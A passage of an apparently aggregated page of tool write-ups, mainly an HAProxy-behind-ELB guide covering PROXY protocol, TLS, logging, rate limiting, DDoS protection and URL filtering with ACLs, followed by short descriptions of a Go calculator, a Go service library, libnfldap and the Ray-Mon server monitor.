  • Application firewall: we perform a first level of filtering in HAProxy, that protects NodeJS against all sorts of attack, known and to come. This will be done by inserting a set of regexes in HAProxy ACLs, that get updated when the application routes are updated. Note that managing these ACLs will not impact uptime, or require redeployment.
  • SSL/TLS: ELBs support the PROXY protocol, and so does HAProxy, which allows us to proxy the tcp connection to HAProxy. It gives us better TLS, backed by OpenSSL, at the cost of managing the TLS keys on the HAProxy instances.
  • Logging: ELBs have limited support for logging. HAProxy, however, has excellent logging for TCP, SSL and HTTPS. We leverage the flexibility of HAProxy’s logging to improve our DDoS detection capabilities. We also want to uniquely identify requests in HAProxy and NodeJS, and correlate events, using a unique-id.

2   Architecture

Below is our target setup:

architecture diagram

3   PROXY protocol between ELB and HAProxy

This configuration uses an Elastic Load Balancer in TCP mode, with PROXY protocol enabled. The PROXY protocol adds a string at the beginning of the TCP payload that is passed to the backend. This string contains the IP of the client that connected to the ELB, which allows HAProxy to feed its internal state with this information, and act as if it had a direct TCP connection to the client.

For more information on the PROXY protocol, see

First, we need to create an ELB, and enable a TCP listener on port 443 that supports the PROXY protocol. The ELB will not decipher the SSL, but instead pass the entire TCP payload down to Haproxy.

3.1   ELB Configuration

PROXY protocol support must be enabled on the ELB.

$ ./elb-describe-lb-policy-types -I AKIA... -S Ww1... --region us-east-1
POLICY_TYPE  ProxyProtocolPolicyType    Policy that controls whether to include the
                                        IP address and port of the originating request
                                        for TCP messages. This policy operates on
                                        TCP/SSL listeners only

The policy name we want to enable is ProxyProtocolPolicyType. We need the load balancer name for that, and the following command:

$ ./elb-create-lb-policy elb123-testproxyprotocol \
--policy-name EnableProxyProtocol \
--policy-type ProxyProtocolPolicyType \
--attribute "name=ProxyProtocol, value=true" \
-I AKIA... -S Ww1... --region us-east-1

OK-Creating LoadBalancer Policy

$ ./elb-set-lb-policies-for-backend-server elb123-testproxyprotocol \
--policy-names EnableProxyProtocol \
--instance-port 443 \
-I AKIA... -S Ww1... --region us-east-1

OK-Setting Policies

Now configure a listener on TCP/443 on that ELB, that points to TCP/443 on the HAProxy instance. On the instance side, make sure that your security group accepts traffic from the ELB security group on port 443.

3.2   HAProxy frontend

The HAProxy frontend listens on port 443 with a SSL configuration, as follow:

frontend https
        bind accept-proxy ssl ......

Note the accept-proxy parameter of the bind command. This option tells HAProxy that whatever sits in front of it will append the PROXY header to TCP payloads.

3.3   SSL/TLS Configuration

HAProxy takes a SSL configuration on the bind line directly. The configuration requires a set of certificates and private key, and a ciphersuite.


Unlike most servers (Apache, Nginx, …), HAProxy takes certificates and keys into a single file, here named bundle.pem. In this file are concatenated the server private key, the server public certificate, the CA intermediate certificate (if any) and a DH parameter (if any). For more information on DH parameters, see .

In the sample below, components of bundle.pem are concatenated as follow:

  • client certificate signed by CA XYZ
  • client private key
  • public DH parameter (2048 bits)
  • intermediate certificate of CA XYZ

The rest of the bind line is a ciphersuite, taken from .

We can verify the configuration using cipherscan. Below is the expected output for our configuration:

$ ./cipherscan
prio  ciphersuite                  protocols                    pfs_keysize
1     ECDHE-RSA-AES128-GCM-SHA256  SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits
2     ECDHE-RSA-AES256-GCM-SHA384  SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits
3     DHE-RSA-AES128-GCM-SHA256    SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
4     DHE-RSA-AES256-GCM-SHA384    SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
5     ECDHE-RSA-AES128-SHA256      SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits
6     ECDHE-RSA-AES128-SHA         SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits
7     ECDHE-RSA-AES256-SHA384      SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits
8     ECDHE-RSA-AES256-SHA         SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits
9     DHE-RSA-AES128-SHA256        SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
10    DHE-RSA-AES128-SHA           SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
11    DHE-RSA-AES256-SHA256        SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
12    DHE-RSA-AES256-SHA           SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
13    AES128-GCM-SHA256            SSLv3,TLSv1,TLSv1.1,TLSv1.2
14    AES256-GCM-SHA384            SSLv3,TLSv1,TLSv1.1,TLSv1.2
15    ECDHE-RSA-RC4-SHA            SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits
16    AES128-SHA256                SSLv3,TLSv1,TLSv1.1,TLSv1.2
17    AES128-SHA                   SSLv3,TLSv1,TLSv1.1,TLSv1.2
18    AES256-SHA256                SSLv3,TLSv1,TLSv1.1,TLSv1.2
19    AES256-SHA                   SSLv3,TLSv1,TLSv1.1,TLSv1.2
20    RC4-SHA                      SSLv3,TLSv1,TLSv1.1,TLSv1.2
21    DHE-RSA-CAMELLIA256-SHA      SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
22    CAMELLIA256-SHA              SSLv3,TLSv1,TLSv1.1,TLSv1.2
23    DHE-RSA-CAMELLIA128-SHA      SSLv3,TLSv1,TLSv1.1,TLSv1.2  DH,2048bits
24    CAMELLIA128-SHA              SSLv3,TLSv1,TLSv1.1,TLSv1.2

3.4   Healthchecks between ELB and HAProxy

As of writing of this document, it appears that ELBs do not use the proxy protocol when running healthchecks against an instance. As a result, these healthchecks cannot be handled by the https frontend, because HAProxy will fail when looking for a PROXY header that isn’t there.

The workaround is to create a secondary frontend in HAProxy that is entirely dedicated to answering healthchecks from the ELB.

The configuration below uses the monitor option to check the health of the nodejs backend. If more than one server is alive in that backend, then our health frontend will return 200 OK. If no server is alive, a 503 will be returned. All the ELB has to do is to query the URL athttp://haproxy_host:34180/haproxy_status . To reduce the overhead, we also disable SSL on the health frontend.

# frontend used to return health status without requiring SSL
frontend health
        bind      # 34180 means EALTH ;)
        # create a status URI in /haproxy_status that will return
        # a 200 is backend is healthy, and 503 if it isn't. This
        # URI is queried by the ELB.
        acl backend_dead nbsrv(nodejs) lt 1
        monitor-uri /haproxy_status
        monitor fail if backend_dead

(note: we could also use ACLs in HAProxy to only expect the PROXY header on certain source IPs, but the approach of a dedicated health frontend seems cleaner)

4   ELB Logging


5   HAProxy Logging

HAProxy supports custom log format, which we want here, as opposed to default log format, in order to capture TCP, SSL and HTTP information on a single line.

For our logging, we want the following:

  1. TCP/IP logs first, such that these are always present, even if HAProxy cuts the connection before processing the SSL or HTTP traffic
  2. SSL information
  3. HTTP information
log-format [%pid]\ [%Ts.%ms]\ %ac/%fc/%bc/%bq/%sc/%sq/%rc\ %Tq/%Tw/%Tc/%Tr/%Tt\ %tsc\ %ci:%cp\ %fi:%fp\ %si:%sp\ %ft\ %sslc\ %sslv\ %{+Q}r\ %ST\ %b:%s\ "%CC"\ "%hr"\ "%CS"\ "%hs"\ req_size=%U\ resp_size=%B

The format above will generate:

Mar 14 17:14:51 localhost haproxy[14887]: [14887] [1394817291.250] 10/5/2/0/3/0/0 48/0/0/624/672 ---- logger - - "GET /v1/ HTTP/1.0" 404 fxa-nodejs:nodejs1 "-" "{||ApacheBench/2.3|over-100-active-connections,over-100-connections-in-10-seconds,high-error-rate,high-request-rate,|47B4176E:8B75_0A977AE4:01BB_5323390B_31E0:3A27}" "-" "" ireq_size=592 resp_size=787

The log-format contains very detailed information on the connection itself, but also on the state of haproxy itself. Below is a description of the fields we used in our custom log format.

  • %pid: process ID of HAProxy
  • %Ts.%ms: unix timestamp + milliseconds
  • %ac: total number of concurrent connections
  • %fc: total number of concurrent connections on the frontend
  • %bc: total number of concurrent connections on the backend
  • %bq: queue size of the backend
  • %sc: total number of concurrent connections on the server
  • %sq: queue size of the server
  • %rc: connection retries to the server
  • %Tq: total time to get the client request (HTTP mode only)
  • %Tw: total time spent in the queues waiting for a connection slot
  • %Tc: total time to establish the TCP connection to the server
  • %Tr: server response time (HTTP mode only)
  • %Tt: total session duration time, between the moment the proxy accepted it and the moment both ends were closed.
  • %tsc: termination state (see 8.5. Session state at disconnection)
  • %ci:%cp: client IP and Port
  • %fi:%fp: frontend IP and Port
  • %si:%sp: server IP and Port
  • %ft: transport type of the frontend (with a ~ suffix for SSL)
  • %sslc %sslv: SSL cipher and version
  • %{+Q}r: HTTP request, between double quotes
  • %ST: HTTP status code
  • %b:%s: backend name and server name
  • %CC: captured request cookies
  • %hr: captured request headers
  • %CS: captured response cookies
  • %hs: captured response headers
  • %U: bytes read from the client (request size)
  • %B: bytes read from server to client (response size)

For more details on the available logging variables, see the HAProxy configuration, under 8.2.4. Custom log format.

5.1   Unique request ID

Tracking requests across multiple servers can be problematic, because the chain of events triggered by a request on the frontend are not tied to each other. HAProxy has a simple mechanism to insert a unique identifier to incoming requests, in the form of an ID inserted in the request headers, and passed to the backend server. This ID can then be logged by the backend server, and passed on to the next step. In a largely distributed environment, the unique ID makes tracking requests propagation a lot easier.

The unique ID is declared on the HTTPS frontend as follow:

# Insert a unique request identifier is the headers of the request
# passed to the backend
unique-id-format %{+X}o\ %ci:%cp_%fi:%fp_%Ts_%rt:%pid
unique-id-header X-Unique-ID

This will add an ID that is composed of hexadecimal variables, taken from the client IP and port, frontend IP and port, timestamp, request counter and PID. An example of generated ID is485B7525:CB2F_0A977AE4:01BB_5319CB0C_000D:27C0.

The Unique ID is added to the request headers passed to the backend in the X-Unique-ID header. We will also capture it in the logs, as a request header.

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cache-Control: max-age=0
X-Unique-ID: 485B7525:CB70_0A977AE4:01BB_5319CD3F_0163:27C0

5.2   Capturing headers and cookies

In the log format, we defined fields for the request and response headers and cookies. But, by default, this fields will show empty in the logs. In order to log headers and cookies, the capture parameters must be set in the frontend.

Here is how we can capture headers sent by the client in the HTTP request.

    capture request header Referrer len 64
capture request header Content-Length len 10
    capture request header User-Agent len 64

Cookies can be captures the same way:

capture cookie mycookie123=  len 32

HAProxy will also add custom headers to the request, before passing it to the backend. However, added headers don’t get logged, because the addition happens after the capture operation. To fix this issue, we are going to create a new frontend dedicated to logging.

5.3   Logging in a separate frontend

During processing of the request, we added custom headers, and we want these headers to appear in the logs. One solution is to route all the request to a secondary frontend that only does logging, and blocking or forwarding.

Classic setup:

 request        +--------------+       +---------------+
+-------------->|frontend      |+----->|backend        |      +---------+
                |   fxa-https  |       |    fxa-nodejs |+---->|         |
                +--------------+       +---------------+      | NodeJS  |
                                                              |         |

Setup with separate logging frontend:

                {no logging}
 request        +--------------+       +---------------+
+-------------->|frontend      |       |backend        |      +---------+
                |   fxa-https  |       |    fxa-nodejs |+---->|         |
                +--------------+       +---------------+      | NodeJS  |
                       +                     ^                |         |
                       |                     |                +---------+
                       |                     |
                +------v-------+       +-----+--------+
                |backend       |+----->|frontend      |
                |     logger   |       |   logger     |
                +--------------+       +--------------+

At the end of the configuration of frontend fxa-https, instead of sending requests to backend fxa-nodejs, we send them to backend logger.

frontend fxa-https
        # Don't log here, log into logger frontend
        no log
        default_backend logger

Then we declare a backend and a frontend for logger:

backend logger
        server localhost localhost:55555 send-proxy

# frontend use to log acl activity
frontend logger
        bind localhost:55555 accept-proxy


        capture request header Referrer len 64
        capture request header Content-Length len 10
        capture request header User-Agent len 64
        capture request header X-Haproxy-ACL len 256
        capture request header X-Unique-ID len 64

        # if previous ACL didn't pass and aren't whitelisted
        acl whitelisted req.fhdr(X-Haproxy-ACL) -m beg whitelisted,
        acl fail-validation req.fhdr(X-Haproxy-ACL) -m found
        http-request deny if !whitelisted fail-validation

        default_backend fxa-nodejs

Note the use of send-proxy and accept-proxy between the logger backend and frontend, allowing to keep the information about the client IP.

Isn’t this slow and inefficient?

Well, obviously, routing request through HAProxy twice isn’t the most elegant way of proxying. But in practice, this approach adds minimal overhead. Linux and HAProxy support TCP splicing, which provides zero-copy transfer of data between TCP sockets. When HAProxy forward the request to the logger socket, there is, in fact, no transfer of data at the kernel level. Benchmark it, it’s fast!

6   Rate limiting & DDoS protection

One of the particularity of operating an infrastructure in AWS, is that control over the network is very limited. Techniques such as BGP blackholing are not available. And visibility over the layer 3 (IP) and 4 (TCP) is reduced. Building protection against DDoS means that we need to block traffic further down the stack, which consumes more resources. This is the main motivation for using ELBs in TCP mode with the PROXY protocol: it gives HAProxy low-level access to the TCP connection, and visibility of the client IP before parsing HTTP headers (like you would traditionally do with X-Forwarded-For).

ELBs have limited resources, but simplify the management of public IPs in AWS. By offloading the SSL & HTTP processing to HAProxy, we reduce the pressure on ELB, while conserving the ability to manage the public endpoints through it.

HAProxy maintains tons of detailed information on connections. One can use this information to accept, block or route connections. In the following section, we will discuss the use of ACLs and stick-tables to block clients that do not respect sane limits.

6.1   Automated rate limiting

The configuration below enable counters to track connections in a table where the key is the source IP of the client:

# Define a table that will store IPs associated with counters
stick-table type ip size 500k expire 30s store conn_cur,conn_rate(10s),http_req_rate(10s),http_err_rate(10s)

# Enable tracking of src IP in the stick-table
tcp-request content track-sc0 src

Let’s decompose this configuration. First, we define a stick-table that stores IP addresses as keys. We define a maximum size for this table of 500,000 IPs, and we tell HAProxy to expire the records after 30 seconds. If the table gets filled, HAProxy will delete records following the LRU logic.

The stick-table will store a number of information associated with the IP address:

  • conn_cur is a counter of the concurrent connection count for this IP.
  • conn_rate(10s) is a sliding window that counts new TCP connections over a 10 seconds period
  • http_req_rate(10s) is a sliding window that counts HTTP requests over a 10 seconds period
  • http_err_rate(10s) is a sliding window that counts HTTP errors triggered by requests from that IP over a 10 seconds period

By default, the stick table declaration doesn’t do anything, we need to send data to it. This is what the tcp-request content track-sc0 src parameter does.

Now that we have tracking in place, we can write ACLs that run tests against the content of the table. The examples below evaluate several of these counters against arbitary limits. Tune these to your needs.

# Reject the new connection if the client already has 100 opened
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]over-100-active-connections, if { src_conn_cur ge 100 }

# Reject the new connection if the client has opened more than 100 connections in 10 seconds
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]over-100-connections-in-10-seconds, if { src_conn_rate ge 100 }

# Reject the connection if the client has passed the HTTP error rate
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]high-error-rate, if { sc0_http_err_rate() gt 100 }

# Reject the connection if the client has passed the HTTP request rate
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]high-request-rate, if { sc0_http_req_rate() gt 500 }

HAProxy provides a lot of flexibility on what can be tracked in a stick-table. Take a look at section 7.3.2. Fetching samples at Layer 4 from the doc to get a better idea.

6.2   Querying tables state in real time

Tables are named after the name of the frontend or backend they live in. Our frontend called fxa-https will have a table called fxa-https, that can be queried through the stat socket:

# echo "show table fxa-https" | socat unix:/var/lib/haproxy/stats -
# table: fxa-https, type: ip, size:512000, used:1
0x1aa3358: key= use=1 exp=29957 conn_rate(10000)=43 conn_cur=1 http_req_rate(10000)=42 http_err_rate(10000)=42

The line above shows a table entry for key, which is a tracked IP address. The other entries on the line show the status of various counters that we defined in the configuration.

6.3   Blacklists & Whitelists

Blacklist and whitelists are simple lists of IP addresses that are checked by HAProxy as early on as possible. Blacklist are checked at the beginning of the TCP connection, which allows for early connection drops, and also means that blacklisting an IP always takes precedence over any other rule, including the whitelist.

Whitelists are checked at the HTTP level, and allow to bypass ACLs and rate limiting.

# Blacklist: Deny access to some IPs before anything else is checked
tcp-request content reject if { src -f /etc/haproxy/blacklist.lst }

# Whitelist: Allow IPs to bypass the filters
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]whitelisted, if { src -f /etc/haproxy/whitelist.lst }
http-request allow if { src -f /etc/haproxy/whitelist.lst }

List files can contain IP addresses or networks in CIDR format.

List files are loaded into HAProxy at startup. If you add or remove IPs from a list, make sure to perform a soft reload.

haproxy -f /etc/haproxy/haproxy.cfg -c && sudo haproxy -f /etc/haproxy/haproxy.cfg -sf $(pidof haproxy)

6.4   Protect against slow clients (Slowloris attack)

Slowloris is an attack where a client very slowly sends requests to the server, forcing it to allocate resources to that client that are only not used. This attack is commonly used in DDoS, by clients that send their requests characters by characters. HAProxy can block these clients, by allocating a maximum amount of time a client can take to send a full request. This is done with the timeout http-request parameter.

# disconnect slow handshake clients early, protect from
# resources exhaustion attacks
timeout http-request 5s

7   URL filtering with ACLs

HAProxy has the ability to inspect requests before passing them to the backend. This is limited to query strings, and doesn’t support inspecting the body of a POST request. But we can already leverage this to filter out unwanted traffic.

The first thing we need, is a list of endpoints sorted by HTTP method. This can be obtained from the web application directly. Note that some endpoints, such as heartbeat should be limited to HAProxy, and thus blocked from clients.

For now, let’s ignore GET URL parameters, and only build a list of request paths, that we store in two files: one for GET requests, and one for POST requests.



In the HAProxy configuration, we can build ACLs around these files. The http-request deny method takes a condition, as described in the Haproxy documentation, section 7.2. Using ACLs to form conditions.

# Requests validation using ACLs ---
acl valid-get path -f /etc/haproxy/get_endpoints.lst
acl valid-post path -f /etc/haproxy/post_endpoints.lst

# block requests that don't match the predefined endpoints
http-request deny unless METH_GET valid-get or METH_POST valid-post

http-request deny does the job, and return a 403 to the client. But if you want more visibility on ACL activity, you may want to use a custom header as describe later in this section.

7.1   Filtering URL parameters on GET requests

While HAProxy supports regexes on URLs, writing regexes that can validate URL parameters is a path that leads to frustration and insanity. A much simpler approach consists of using the url_param ACL provided by HAProxy.

For example, take the NodeJS endpoint below:

  method: 'GET',
  path: '/verify_email',
  config: {
    validate: {
      query: {
        code: isA.string().max(32).regex(HEX_STRING).required(),
        uid: isA.string().max(32).regex(HEX_STRING).required(),
        service: isA.string().max(16).alphanum().optional(),
        redirectTo: isA.string()
  handler: function (request, reply) {
    return reply().redirect(config.contentServer.url + request.raw.req.url)

This endpoints receives requests on /verify_email with the parameters code, a 32 character hexadecimal, uid, a 32 character hexadecimal, service, a 16 character string, and redirectTo, a FQDN. However, only code and uid are required.

In the previous section, we validated that requests on /verify_email must use the method GET. Now we are taking the validation one step further, and blocking requests on this endpoint that do not match our prerequisite.

acl endpoint-verify_email path /verify_email
acl param-code urlp_reg(code) [0-9a-fA-F]{1,32}
acl param-uid urlp_reg(uid) [0-9a-fA-F]{1,32}
http-request deny if endpoint-verify_email !param-code or endpoint-verify_email !param-uid

The follow request will be accepted, everything else will be rejected with a HTTP error 403.


Using regexes to validate URL parameters is a powerful feature. Below is another example that matches an email addresses using case-insensitive regex:

acl endpoint-complete_reset_password path /complete_reset_password
acl param-email urlp_reg(email) -i ^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$
acl param-token urlp_reg(token) [0-9a-fA-F]{1,64}
http-request deny if endpoint-complete_reset_password !param-email or endpoint-complete_reset_password !param-token or endpoint-complete_reset_password !param-code

Note that we didn’t redefine param-code when we reused it in the http-request deny command. This is because ACL are defined globally for a frontend, and can be reused multiple times.

7.2   Filtering payloads on POST requests

POST requests are harder to validate, because they do not follow a predefined format, but also because the client could be sending the body over a long period of time, split over dozens of packets.

However, in the case of an API that only handles small POST payloads, we can at least verify the size of the payload sent by the client, and make sure that clients do not overload the backend with random data. This can be done using an ACL on the content-length header of the request. The ACL below discard requests that have a content-length larger than 5 kilo-bytes (which is already a lot of text).

# match content-length larger than 5kB
acl request-too-big hdr_val(content-length) gt 5000
http-request deny if METH_POST request-too-big

7.3   Marking instead of blocking

Blocking requests may be the preferred behavior in production, but only after a grace period that allows you to build a traffic profile, and fine tune your configuration. Instead of using http-request deny statements in the ACLs, we can insert a header with a description of the blocking decision. This header will be logged, and can be analyzed to verify that no legitimate traffic would be blocked.

As discussed in Logging in a separate frontend, HAProxy is unable to log request header that it has set itself. So make sure to log in a separate frontend if you use this technique.

The configuration below uses a custom header X-Haproxy-ACL. If an ACL matches, the header is set to the name of the ACL that matched. If several ACLs match, each ACL name is appended to the header, and separated by a comma.

At the end of the ACL evaluation, if this header is present in the request, we know that the request should be blocked.

In the fxa-https frontend, we replace the http-request deny paramameters with the following logic:

# ~~~ Requests validation using ACLs ~~~
# block requests that don't match the predefined endpoints
acl valid-get path -f /etc/haproxy/get_endpoints.lst
acl valid-post path -f /etc/haproxy/post_endpoints.lst
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]invalid-endpoint, unless METH_GET valid-get or METH_POST valid-post

# block requests on verify_email that do not have the correct params
acl endpoint-verify_email path /v1/verify_email
acl param-code urlp_reg(code) [0-9a-fA-F]{1,32}
acl param-uid urlp_reg(uid) [0-9a-fA-F]{1,32}
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]invalid-parameters, if endpoint-verify_email !param-code or endpoint-verify_email !param-uid

# block requests on complete_reset_password that do not have the correct params
acl endpoint-complete_reset_password path /v1/complete_reset_password
acl param-email urlp_reg(email) -i ^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$
acl param-token urlp_reg(token) [0-9a-fA-F]{1,64}
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]invalid-parameters, if endpoint-complete_reset_password !param-email or endpoint-complete_reset_password !param-token or endpoint-complete_reset_password !param-code

# block content-length larger than 500kB
acl request-too-big hdr_val(content-length) gt 5000
http-request add-header X-Haproxy-ACL %[req.fhdr(X-Haproxy-ACL,-1)]request-too-big, if METH_POST request-too-big

Note the %[req.fhdr(X-Haproxy-ACL,-1)] parameter, that retrieves the value of the latest occurence of the X-Haproxy-ACL header, so we can append to it and store it again. However, this will create multiple headers if more than one ACL is matched, but that’s OK because: – we can delete them before sending the request to the backend, using reqdel – the logging directive capture request header will only log the last occurence

X-Haproxy-ACL: over-100-active-connections,
X-Haproxy-ACL: over-100-active-connections,over-100-connections-in-10-seconds,
X-Haproxy-ACL: over-100-active-connections,over-100-connections-in-10-seconds,high-error-rate,
X-Haproxy-ACL: over-100-active-connections,over-100-connections-in-10-seconds,high-error-rate,high-request-rate,

Then, in the logger frontend, we check the value of the header, and block if needed.

# frontend use to log acl activity
frontend logger
        # if previous ACL didn't pass, and IP isn't whitelisted, block the request
        acl whitelisted req.fhdr(X-Haproxy-ACL) -m beg whitelisted,
        acl fail-validation req.fhdr(X-Haproxy-ACL) -m found
        http-request deny if !whitelisted fail-validation

8   HAProxy management

8.1   Enabling the stat socket

8.2   Collecting statistics

8.3   Analyzing errors

8.4   Parsing performance metrics from the logs

8.5   Soft reload

HAProxy supports soft configuration reload, that doesn’t drop connections. To perform a soft reload, call haproxy with the following command:

$ sudo /opt/haproxy -f /etc/haproxy/haproxy.cfg -sf $(pidof haproxy)

The old process will be replaced with a new one, that uses a fresh configuration. The logs will show the reload:

Mar  6 12:59:41 localhost haproxy[7603]: Proxy https started.
Mar  6 12:59:41 localhost haproxy[7603]: Proxy app started.
Mar  6 12:59:41 localhost haproxy[5763]: Stopping frontend https in 0 ms.
Mar  6 12:59:41 localhost haproxy[5763]: Stopping backend app in 0 ms.
Mar  6 12:59:41 localhost haproxy[5763]: Proxy https stopped (FE: 29476 conns, BE: 0 conns).
Mar  6 12:59:41 localhost haproxy[5763]: Proxy app stopped (FE: 0 conns, BE: 1746 conns).

9   Full HAProxy configuration

10   Building process

10.1   Static build

The script builds haproxy with statically linked OpenSSL and PCRE support.

10.2   Dynamic build

The script does the same as above, but links to PCRE and OpenSSL dynamically.

10.3   RPM build

Using the spec file in haproxy.spec and bash scripts in, we can build a RPM package using for the latest development version of HAProxy.


More information can be found on:

Random scripts accumulated over years of sysadminesque linuxeries


A collection of random scripts and tools that I accumulated over the years.

These aren’t supported, and are catered for my own personal needs.

Find them on:

Calc – A simple, fast command-line calculator written in Go


GoDoc Build Status

A simple, fast, and intuitive command-line calculator written in Go.


Install calc as you would any other Go program:

go get


You can use calc in two ways: shell mode and command.

Shell mode

This is probably the mode you’ll want to use. It’s like the python shell or irb. The shell mode uses theterminal package provided by, which means it supports many of the shell features you know and love (like history, pasting, and the exit command).

> 1+1
> 3(5/(3-4))
> 3pi^2
> @+1
> @@@*2
> ln(-1)


You can also use calc to evaluate an expression with just a single command (i.e. without opening the shell). To do this, just use calc [expression]:

bash$ calc 1+1

Supported functions, operators, and constants

calc supports all the standard stuff, and I’m definitely adding more later (also feel free to fork and add your own!)


+, -, *, /, ^, %


sin, cos, tan, cot, sec, csc, asin, acos, atan, acot, asec, acsc, sqrt, log, lg, ln, abs


e, pi, π


Previous results can be accessed with the @ symbol. A single @ returns the result of the last computation, while multiple @ gets the nth last result, where n is the number of @s used (for example, @@ returns the second-last result, @@@@@ returns the fifth-last result).

Why not use …?

  • Google
    • Doesn’t work without an internet connection
    • Slower
    • Doesn’t show previous computations, so you end up with multiple tabs open at once.
  • Spotlight (on OS X)
    • No history
    • Switching between Spotlight and other windows isn’t too fun
  • Python/IRB
    • Requires use of a separate math module for most functions and constants
    • A little bit slower to start up
  • bc
    • Limited number of built-in functions; these have shortened (not too intuitive) names as well.

The alternatives above are all great, and have their own advantages over calc. I highly recommend looking into these if you don’t like how calc works.

More information can be found on:

Service – Run go programs as a service on major platforms

service (BETA)

service will install / un-install, start / stop, and run a program as a service (daemon). Currently supports Windows XP+, Linux/(systemd | Upstart | SysV), and OSX/Launchd.

Windows controls services by setting up callbacks that is non-trivial. This is very different then other systems. This package provides the same API despite the substantial differences. It also can be used to detect how a program is called, from an interactive terminal or from a service manager.


  • OS X when running as a UserService Interactive will not be accurate.
  • Determine if UserService should remain in main configuration.
  • Hook up Dependencies field for Linux systems and Launchd.

More Information Can Be Found On:

libnfldap – A Python module to generate IPTables and IPSet rules from LDAP records


A Python module to generate IPTables and IPSet rules from LDAP records. See for a demo.


Use PyPi:

$ sudo pip install libnfldap

Or build a RPM using:

$ python bdist_rpm

The later will require python-ldap to be installed separately, either using yum install python-ldap or pip install ldap. It’s up to you, the RPM will not attempt to install the ldap dependency.


The script at will build iptables and ipset rules for all users in LDAP. You can provide the script an ldap filter as argv[1] to limit the scope.

$ time python '(uid=jvehent)'
IPTables rules written in /tmp/tmpT7JgOW
IPSet rules written in /tmp/tmpJYtWM5

real    0m0.605s
user    0m0.061s
sys     0m0.014s does something similar but for a single user identified by its uidNumber (unix user ID).

$ python 2297
#Generating rules for user ID 1664
#====== ACL details ======
jvehent has access to .....


Julien Vehent & Guillaume Destuynder (@ mozilla)

More information can be found on:

Ray-Mon – PHP and Bash server status monitoring

Ray-Mon is a linux server monitoring script written in PHP and Bash, utilizing JSON as data storage. It requires only bash and a webserver on the client side, and only php on the server side. The client currently supports monitoring processes, uptime, updates, amount of users logged in, disk usage, RAM usage and network traffic.


  • Ping monitor
  • History per host
  • Threshold per monitored item.
  • Monitors:
    • Processes (lighttpd, apache, nginx, sshd, munin etc.)
    • RAM
    • Disk
    • Uptime
    • Users logged on
    • Updates
    • Network (RX/TX)


Either git clone the github repo:

git clone git://

Or download the zipfile from github:

Or download the zipfile from

This is the github page:


  • Server side now only requires 1 script instead of 2.
  • Client script creates the json better, if a value is missing the json file doesn’t break.
  • Changed the visual style to a better layout.
  • Thresholds implemented and configurable.
  • History per host now implemented.
  • Initial release



The script is a bash script which outputs JSON. It requires root access and should be run as root. It also requires a webserver, so that the server can get the json file.

Software needed for the script:

  • bash
  • awk
  • grep
  • ifconfig
  • package managers supported: apt-get, yum and pacman (debian/ubuntu, centos/RHEL/SL, Arch)

Setup a webserver (lighttpd, apache, boa, thttpd, nginx) for the script output. If there is already a webserver running on the server you dont need to install another one.

Edit the script:

Network interfaces. First one is used for the IP, the second one is used for bandwidth calculations. This is done because openVZ has the “venet0” interface for the bandwidth, and the venet0:0 interface with an IP. If you run bare-metal or KVM or vserver etc. you can set these two to the same value (eth0 eth1 etc).

# Network interface for the IP address
# network interface for traffic monitoring (RX/TX bytes)

The IP address of the server, this is used by me when deploying this script via chef or ansible. You can set it, but it is not required.

Services are checked by doing a ps to see if the process is running. The last service should be defined without a comma, for valid JSON. The code below monitors “sshd”, “lighttpd”, “munin-node” and “syslog”.

if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n ""$SERVICE" : "running","; else echo -n ""$SERVICE" : "not running","; fi
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n ""$SERVICE" : "running","; else echo -n ""$SERVICE" : "not running","; fi
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n ""$SERVICE" : "running","; else echo -n ""$SERVICE" : "not running","; fi
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n ""$SERVICE" : "running""; else echo -n ""$SERVICE" : "not running""; fi

To add a service, copy the 2 lines and replace the SERVICE=processname with the actual process name:

if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n ""$SERVICE" : "running","; else echo -n ""$SERVICE" : "not running","; fi

And, make sure the last service montiored does not echo a comma at the end, else the JSON is not valid and the php script fails.

Now setup a cronjob to execute the script on a set interval and save the JSON to the webserver directory.

As root, create the file /etc/cron.d/raymon-client with the following contents:

*/5 * * * * root /root/scripts/ | sed ':a;N;$!ba;s/n//g' > /var/www/stat.json

